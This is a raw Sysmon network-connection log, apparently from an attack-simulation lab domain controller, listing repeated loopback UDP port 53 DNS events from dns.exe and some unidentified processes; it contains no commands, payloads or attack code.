354300x8000000000000000204986Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.263{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53156- 354300x8000000000000000204985Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.263{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53156- 354300x8000000000000000204984Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.263{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53155- 354300x8000000000000000204983Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.263{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53155- 354300x8000000000000000204982Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.263{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53154- 354300x8000000000000000204981Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.263{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53154- 354300x8000000000000000204980Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.170{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53153- 354300x8000000000000000204979Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.169{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53153- 354300x8000000000000000204978Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.081{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53152- 354300x8000000000000000204977Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.081{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53152- 354300x8000000000000000204976Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.081{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53151- 354300x8000000000000000204975Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.080{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53151- 354300x8000000000000000204974Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.080{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53150- 354300x8000000000000000204973Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.080{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53150- 354300x8000000000000000204972Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.999{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53149- 354300x8000000000000000204971Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.999{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53149- 354300x8000000000000000204970Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.999{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53148- 354300x8000000000000000204969Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.998{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53148- 354300x8000000000000000204968Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.998{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53147- 354300x8000000000000000204967Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.998{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53147- 354300x8000000000000000204966Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.937{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53146- 354300x8000000000000000204965Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.937{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53146- 354300x8000000000000000204964Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.937{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53145- 354300x8000000000000000204963Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.937{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53145- 354300x8000000000000000204962Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.936{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53144- 354300x8000000000000000204961Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.936{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53144- 354300x8000000000000000204960Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.867{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53143- 354300x8000000000000000204959Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.867{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53143- 354300x8000000000000000204958Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.867{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53142- 354300x8000000000000000204957Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.867{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53142- 354300x8000000000000000204956Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.867{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53141- 354300x8000000000000000204955Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.867{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53141- 354300x8000000000000000204954Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.798{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53140- 354300x8000000000000000204953Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.798{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53140- 354300x8000000000000000204952Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.798{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53139- 354300x8000000000000000204951Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.798{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53139- 354300x8000000000000000204950Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.798{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53138- 354300x8000000000000000204949Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.798{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53138- 354300x8000000000000000204948Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.736{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53137- 354300x8000000000000000204947Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.736{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53137- 354300x8000000000000000204946Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.663{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53135- 354300x8000000000000000204945Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.663{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53135- 354300x8000000000000000204944Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.663{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53134- 354300x8000000000000000204943Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.662{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53134- 354300x8000000000000000204942Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.662{00000000-0000-0000-0000-000000000000}7836<unknown process>-udptruefalse127.0.0.1-53134-false127.0.0.1-53domain 354300x8000000000000000204941Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.662{00000000-0000-0000-0000-000000000000}7836<unknown process>-udpfalsefalse127.0.0.1-53133-false127.0.0.1-53domain 354300x8000000000000000204940Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.662{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53133- 354300x8000000000000000204939Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.662{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53133- 354300x8000000000000000204938Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.662{00000000-0000-0000-0000-000000000000}7836<unknown process>-udptruefalse127.0.0.1-53133-false127.0.0.1-53domain 354300x8000000000000000204937Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.596{00000000-0000-0000-0000-000000000000}6244<unknown process>-udpfalsefalse127.0.0.1-53132-false127.0.0.1-53domain 354300x8000000000000000204936Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.596{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53132- 354300x8000000000000000204935Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.596{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53132- 354300x8000000000000000204934Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.596{00000000-0000-0000-0000-000000000000}6244<unknown process>-udptruefalse127.0.0.1-53132-false127.0.0.1-53domain 354300x8000000000000000204933Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.596{00000000-0000-0000-0000-000000000000}6244<unknown process>-udpfalsefalse127.0.0.1-53131-false127.0.0.1-53domain 354300x8000000000000000204932Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.596{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53131- 354300x8000000000000000204931Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.596{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53131- 354300x8000000000000000204930Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.596{00000000-0000-0000-0000-000000000000}6244<unknown process>-udptruefalse127.0.0.1-53131-false127.0.0.1-53domain 354300x8000000000000000204929Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.595{00000000-0000-0000-0000-000000000000}6244<unknown process>-udpfalsefalse127.0.0.1-53130-false127.0.0.1-53domain 354300x8000000000000000204928Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.595{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53130- 354300x8000000000000000204927Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.595{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53130- 354300x8000000000000000204926Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.595{00000000-0000-0000-0000-000000000000}6244<unknown process>-udptruefalse127.0.0.1-53130-false127.0.0.1-53domain 354300x8000000000000000204925Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.515{00000000-0000-0000-0000-000000000000}4784<unknown process>-udpfalsefalse127.0.0.1-53129-false127.0.0.1-53domain 354300x8000000000000000204924Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.515{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53129- 354300x8000000000000000204923Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.514{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53129- 354300x8000000000000000204922Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.514{00000000-0000-0000-0000-000000000000}4784<unknown process>-udptruefalse127.0.0.1-53129-false127.0.0.1-53domain 354300x8000000000000000204921Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.514{00000000-0000-0000-0000-000000000000}4784<unknown process>-udpfalsefalse127.0.0.1-53128-false127.0.0.1-53domain 354300x8000000000000000204920Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.514{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53128- 354300x8000000000000000204919Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.514{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53128- 354300x8000000000000000204918Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.513{00000000-0000-0000-0000-000000000000}4784<unknown process>-udptruefalse127.0.0.1-53128-false127.0.0.1-53domain 354300x8000000000000000204917Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.513{00000000-0000-0000-0000-000000000000}4784<unknown process>-udpfalsefalse127.0.0.1-53127-false127.0.0.1-53domain 354300x8000000000000000204916Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.513{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53127- 354300x8000000000000000204915Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.513{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53127- 354300x8000000000000000204914Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.513{00000000-0000-0000-0000-000000000000}4784<unknown process>-udptruefalse127.0.0.1-53127-false127.0.0.1-53domain 354300x8000000000000000204913Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.421{00000000-0000-0000-0000-000000000000}2672<unknown process>-udpfalsefalse127.0.0.1-53126-false127.0.0.1-53domain 354300x8000000000000000204912Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.421{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53126- 354300x8000000000000000204911Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.421{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53126- 354300x8000000000000000204910Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.421{00000000-0000-0000-0000-000000000000}2672<unknown process>-udptruefalse127.0.0.1-53126-false127.0.0.1-53domain 354300x8000000000000000204909Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.421{00000000-0000-0000-0000-000000000000}2672<unknown process>-udpfalsefalse127.0.0.1-53125-false127.0.0.1-53domain 354300x8000000000000000204908Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.421{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53125- 354300x8000000000000000204907Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.421{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53125- 354300x8000000000000000204906Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.420{00000000-0000-0000-0000-000000000000}2672<unknown process>-udptruefalse127.0.0.1-53125-false127.0.0.1-53domain 354300x8000000000000000204905Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.420{00000000-0000-0000-0000-000000000000}2672<unknown process>-udpfalsefalse127.0.0.1-53124-false127.0.0.1-53domain 354300x8000000000000000204904Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.420{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53124- 354300x8000000000000000204903Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.420{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53124- 354300x8000000000000000204902Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.420{00000000-0000-0000-0000-000000000000}2672<unknown process>-udptruefalse127.0.0.1-53124-false127.0.0.1-53domain 354300x8000000000000000204901Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.334{00000000-0000-0000-0000-000000000000}7736<unknown process>-udpfalsefalse127.0.0.1-53123-false127.0.0.1-53domain 354300x8000000000000000204900Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.334{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53123- 354300x8000000000000000204899Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.333{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53123- 354300x8000000000000000204898Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.333{00000000-0000-0000-0000-000000000000}7736<unknown process>-udptruefalse127.0.0.1-53123-false127.0.0.1-53domain 354300x8000000000000000204897Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.333{00000000-0000-0000-0000-000000000000}7736<unknown process>-udpfalsefalse127.0.0.1-53122-false127.0.0.1-53domain 354300x8000000000000000204896Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.333{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53122- 354300x8000000000000000204895Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.333{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53122- 354300x8000000000000000204894Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.333{00000000-0000-0000-0000-000000000000}7736<unknown process>-udptruefalse127.0.0.1-53122-false127.0.0.1-53domain 354300x8000000000000000204893Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.333{00000000-0000-0000-0000-000000000000}7736<unknown process>-udpfalsefalse127.0.0.1-53121-false127.0.0.1-53domain 354300x8000000000000000204892Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.333{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53121- 354300x8000000000000000204891Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.333{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53121- 354300x8000000000000000204890Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.333{00000000-0000-0000-0000-000000000000}7736<unknown process>-udptruefalse127.0.0.1-53121-false127.0.0.1-53domain 354300x8000000000000000204889Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.238{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53120- 354300x8000000000000000204888Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.238{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53120- 354300x8000000000000000204887Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.118{00000000-0000-0000-0000-000000000000}5332<unknown 